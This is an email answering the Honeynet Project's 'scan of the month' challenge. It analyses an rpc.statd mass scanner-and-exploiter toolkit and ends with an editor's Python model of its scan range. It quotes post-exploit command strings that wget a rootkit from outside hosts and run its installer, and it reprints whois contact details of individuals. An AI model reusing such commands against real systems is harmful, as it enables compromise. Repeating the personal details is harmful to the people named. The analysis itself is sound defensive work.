From sigquit@hideout.art.ro Sat Mar 17 20:02:52 2001
Date: Mon, 12 Mar 2001 09:36:33 +0200
From: Octavian Popescu
To: project@honeynet.org
Subject: scan of the month - march

Hello,

I'm sorry for the possible grammar mistakes, but I wrote this quite in a hurry, between studying for two exams. ;) Anyway, here it goes:

1. What is the blackhat attempting to do with his command line syntax?

After downloading and decompressing the tool, our hacker uses it to launch a mass scan for a well-known rpc.statd vulnerability. Please read "scan" as "scan and exploit".

The two arguments of the "luckgo" script are the first two portions (bytes, if we talk in binary) of the IP address from which the scan begins (216 210 <> 216.210.0.0), e.g. ./luckgo 216 210 means that all the addresses within the range [216-255].[210-255].[0-255].[0-255] will be scanned for an open port 111 (rather useless, since the C class ends at 223). The first address being scanned will be 216.210.0.0, the second one 216.210.0.1 and so on.

2,3. What does the tool accomplish? How does the tool work?

First of all, the tool is built from several files, each one with a specific role:

luckgo: Bash script that works as a frontend (a very colorful and useless one) for the next tools. The "if" condition on lines 40-43 is never met - probably our script is a modified version (the ANSI part was added) of a simpler one. Its main purpose is to make "luckscan-a" scan the IP ranges provided as arguments (explained earlier) for open 111 ports.

luckscan-a: the scanner. It accepts four arguments - the first, second and third byte of the IP address (I'll call them aa, bb, cc) and a port number. It scans the range aa.bb.cc.0 - 255.255.255.255 for the port specified as the second argument.
In our case, the desired port is 111 (rpc.portmap). When it finds an IP with port 111 open, it launches the rpc.statd exploit (luckstatdx) with that IP as an argument.

luckstatdx: the exploit. This is a modified version of the rpc.statd exploit (statdx.c), coded by ron1n. It is launched by luckscan-a with the '-d 0 ip_with_111_open' arguments (it is assumed that the victim OS is a Redhat 6.2).

luckscan-a.c, luckstatdx.c: the presumed sources for the executables above (we'll see later that things are a little bit different).

Step by step:

* luckgo launches luckscan-a on the desired ranges.
* luckscan-a begins scanning for servers with port 111 open.
* when a server is found, luckstatdx is launched with that server's name as an argument.
* luckstatdx - if the overflow succeeds, the following line is written to the socket and executed on the remote system:

  "cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz"

  (or at least this is what luckstatdx.c tells us)

In other words, after confirming that you can execute commands remotely, the program non-interactively downloads a rootkit from another server onto the hacked system and installs it.

As mentioned before, this tool is based on an rpc.statd vulnerability discovered by Daniel Jacobowitz in July '00. Briefly about the vulnerability: rpc.statd passes user-supplied data to the syslog() function without validating it. A user may supply machine code to be executed with the privileges of the rpc.statd process (root).

4. Is this tool a worm, or would you classify it as something else?

I guess I already answered this one. It's not a worm, but an automated mass vulnerability scanner and exploiter. The main difference between a worm and our tool is that the latter doesn't propagate by itself. It only scans for vulnerable systems, exploits them, installs the rootkit and then stops.
Yet, with some minor modifications, it could be transformed into a ramen-like worm. ;)

5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

The statd exploit (luckstatdx.c) is based on ron1n's statdx.c, published to BUGTRAQ on 5 Aug 2000. Modifications: some lame credits were added, extra commands are written to the socket after the overflow succeeds (the wget part), and some of the default messages are replaced.

Also, the scanner (luckscan-a.c) is based on an older tool, pscan.c. Modifications: when an open port was found, the original tool only printed the IP address and then kept on scanning. luckscan-a also launches the statd exploit when finding a presumably vulnerable server.

6. What information can you obtain about who is using or created the tool?

I'll try to point out only the information that can lead to an identification of the intruder.

* www.becys.org

  Whois data:

    Administrative Contact:
      Qian Wang  becys@yahoo.com
      bSoft
      1 Hensel Dr. Apt.#Z1F
      College Station, Texas 77840
      US
      Phone- (979)862-9233

  Hosted by websitesource.com.

* luckscan-a

  Compiled on a Redhat system (probably 6.2).

* luckstatdx

  The first thing to be noticed is that this isn't the compiled version of the "luckstatdx.c" found in the LUCKROOT.TAR archive. If we browse through the binary, we'll notice the following:

  * the web server that hosts the rootkit is different from the one in the source.
  * the rootkit's archive name is also different.

  Anyway, here are the new commands that will be sent to the socket after the overflow occurs:

  "cd /; uname -a; id; wget neamtu.lsa.ro/rg.tgz; tar zxvf rk.tgz; cd 2; ./install.sh; cd /; rm -rf rk.tgz; rm -rf 2"

  The fun part is that due to a typo, the rootkit won't be installed at all. Anyway, "neamtu.lsa.ro" points us to Romania.
This host doesn't seem to exist anymore, but a whois lookup on the domain "lsa.ro" shows some neat stuff:

    person:   Dragos Ionut
    address:  Brodway 6.0
    address:  NewYork
    address:  Ny 32123
    address:  US
    phone:    +1 323 23232
    e-mail:   taune@digitalunix.org

A probably fake identity and a legit email address. If we play around a little bit more with whois and DNS records, we'll finally discover that one legit Romanian company that sells, among other stuff, internet services, uses as a secondary nameserver one of the hosts involved in the attack. I'd better stop now ;)

Now for the rootkit: the "install" script contains some interesting info:

    echo "1 193.231.139" >>/dev/caca
    echo "1 213.154.137" >>/dev/caca
    echo "1 193.254.34" >>/dev/caca

These are supposed to be the IP addresses which shouldn't show up in the system's logs, in the process list (ps, top) or in netstat -an. Let's see:

    inetnum:  193.231.139.0 - 193.231.139.255
    netname:  ROEDUNET-LICEE1
    descr:    Allocated to ROEDUNET connected highschools

What a surprise! :)

    inetnum:  213.154.135.0 - 213.154.140.255
    netname:  PCNET
    descr:    PCNET - ATM-ADSL Network

PCNET is a Romanian ISP - I guess these are the IPs assigned to dialup.

    inetnum:  193.254.34.0 - 193.254.34.15
    netname:  FININVNET
    descr:    FININVEST
    country:  RO

That would be all. Thanks for the patience.
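As an added illustration of the range arithmetic in answers 1 and 2,3 above (editor's example; this is not code from LUCKROOT.TAR or from the message's author), the following Python models the walk that ./luckgo aa bb performs as the message describes it, so a responder can check a firewall log entry against the reported scan without enumerating the whole range. The iteration order, the no-reset treatment of the second octet, and the cut-off at 223 for "useful" targets are assumptions, since the message does not spell them out.

```python
"""Model of the address space walked by `./luckgo aa bb`, as described in the
analysis above. Added example, not code from LUCKROOT.TAR or from the message.

Assumptions (the message does not spell these out):
  * luckgo iterates the first octet from aa up to 255 and the second octet from
    bb up to 255, never resetting the second octet to 0;
  * for every (a, b) pair luckscan-a walks the last two octets 0..255 in order,
    so 216.210.0.0 is probed first, 216.210.0.1 second, and so on;
  * a first octet above 223 is class D/E space and is counted as wasted, which
    is the "rather useless" part of the range the message points out.
"""
from ipaddress import IPv4Address
from typing import Iterator, Optional

PORT = 111  # rpc.portmap, the only port luckscan-a is asked to probe here


def luckgo_targets(aa: int, bb: int) -> Iterator[IPv4Address]:
    """Yield probe targets in the order the tool would try them."""
    for a in range(aa, 256):
        for b in range(bb, 256):
            for c in range(256):
                for d in range(256):
                    yield IPv4Address(f"{a}.{b}.{c}.{d}")


def scan_index(ip: str, aa: int, bb: int) -> Optional[int]:
    """Position of `ip` in the walk, or None if the walk never reaches it.

    Computed arithmetically: the full walk for 216/210 is about 120 million
    addresses, far too many to enumerate just to place one log entry.
    """
    a, b, c, d = IPv4Address(ip).packed  # four octets as ints
    if a < aa or b < bb:
        return None
    pairs_before = (a - aa) * (256 - bb) + (b - bb)  # (a, b) pairs already walked
    return pairs_before * 65536 + c * 256 + d


def is_unicast_target(ip: str) -> bool:
    """True for class A-C space (first octet <= 223); false for class D/E."""
    return IPv4Address(ip).packed[0] <= 223


def wasted_targets(aa: int, bb: int) -> int:
    """Number of addresses in the walk that lie above 223.x.x.x and so can
    never host an rpc.statd, under the assumptions stated above."""
    first_wasted = max(aa, 224)
    if first_wasted > 255:
        return 0
    return (256 - first_wasted) * (256 - bb) * 65536


if __name__ == "__main__":
    gen = luckgo_targets(216, 210)
    for i in range(3):
        print(i, next(gen))
    print("216.211.0.0 is probe number", scan_index("216.211.0.0", 216, 210))
    print("wasted probes:", wasted_targets(216, 210))
```

scan_index gives the ordinal position of a destination in the walk, which is the number a responder would compare between several sites' logs to confirm they were hit by the same run; wasted_targets quantifies the 224-255 tail the message calls useless.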